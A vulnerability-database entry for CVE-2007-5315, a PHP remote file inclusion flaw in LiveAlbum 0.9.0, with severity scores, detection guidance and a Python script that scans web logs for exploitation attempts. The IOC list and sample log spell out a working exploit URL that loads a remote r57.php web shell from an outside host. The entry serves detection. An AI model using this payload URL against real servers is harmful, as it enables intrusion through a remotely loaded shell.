CVE-2007-5315
published 2007-10-09

Priority: P3 44 | medium | 6.8 CVSS 2.0
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 38.56% (98.4th percentile)
PHP remote file inclusion vulnerability in common.php in LiveAlbum 0.9.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the livealbum_dir parameter.

Affected

1 range

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softpedia | livealbum | | |

Detection & IOCs (extracted from sources)

url: http://[TARGET]/[PATH]/common.php?livealbum_dir=http://xmors.by.ry/r57.php?
domain: xmors.by.ry
path: /common.php
filename: r57.php
  • Detect HTTP requests to common.php with a remote URL supplied in the livealbum_dir parameter, indicating an RFI exploitation attempt.
  • Monitor GET/POST requests where the livealbum_dir parameter contains an http:// or https:// URL, especially those ending with a trailing '?' (null-byte/parameter injection pattern).
  • Presence of r57.php in the livealbum_dir parameter value is a strong indicator of RFI shell-drop activity.
  • The vulnerability is only exploitable when register_globals is enabled in the PHP configuration; installations with register_globals disabled are not affected.
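
The detection bullets above, applied to web server access logs, as an added example that is not part of the original entry. It assumes combined-format log lines and inspects only the query string (POST bodies do not appear in access logs); the sample lines, the /gallery path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r"^\s*https?://", re.IGNORECASE)

def inspect_line(line):
    """Return a finding for a remote URL in livealbum_dir on common.php, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    if not unquote(target.path).lower().endswith("/common.php"):
        return None
    # parse_qsl percent-decodes once, as PHP does, so http%3A%2F%2F is caught too
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name != "livealbum_dir" or not REMOTE_URL_RE.match(value):
            continue
        tags = ["remote-url"]
        if value.endswith("?"):
            tags.append("trailing-question-mark")
        if "r57.php" in value.lower():
            tags.append("r57.php")
        return {"client": line.split(" ", 1)[0], "method": m.group("method"),
                "value": value, "tags": tags}
    return None

def scan(lines):
    """Findings for every matching line, in log order."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation IP ranges, hypothetical /gallery path)
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Oct/2007:10:00:01 +0000] "GET /gallery/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Oct/2007:10:00:05 +0000] "GET /gallery/common.php?livealbum_dir=http://xmors.by.ry/r57.php? HTTP/1.1" 200 812',
    '198.51.100.7 - - [09/Oct/2007:10:00:09 +0000] "GET /gallery/common.php?livealbum_dir=HTTPS%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.0" 200 64',
    '192.0.2.10 - - [09/Oct/2007:10:00:12 +0000] "GET /gallery/common.php?livealbum_dir=./ HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A local value such as `./` in livealbum_dir is not flagged; only values that decode to an http:// or https:// URL are reported.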